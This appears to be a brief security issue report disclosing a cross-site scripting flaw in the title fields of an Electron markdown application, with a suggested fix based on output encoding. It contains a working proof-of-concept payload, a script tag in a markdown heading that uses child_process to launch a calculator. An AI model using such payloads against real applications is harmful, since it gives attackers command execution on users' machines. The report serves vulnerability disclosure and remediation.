[Security] XSS RCE

[H8to]

The current implementation allows for XSS in the title fields.

XSS in Electron allows to interact with the system api and execute applications or commands.

Markdown POC:

# sometitle <script type="text/javascript">window.top.require('child_process').execFile('/usr/bin/gnome-calculator',function(){});</script>

Fix:
Encode output before it is represented to the ui.
OWASP XSS Prevention Cheat Sheet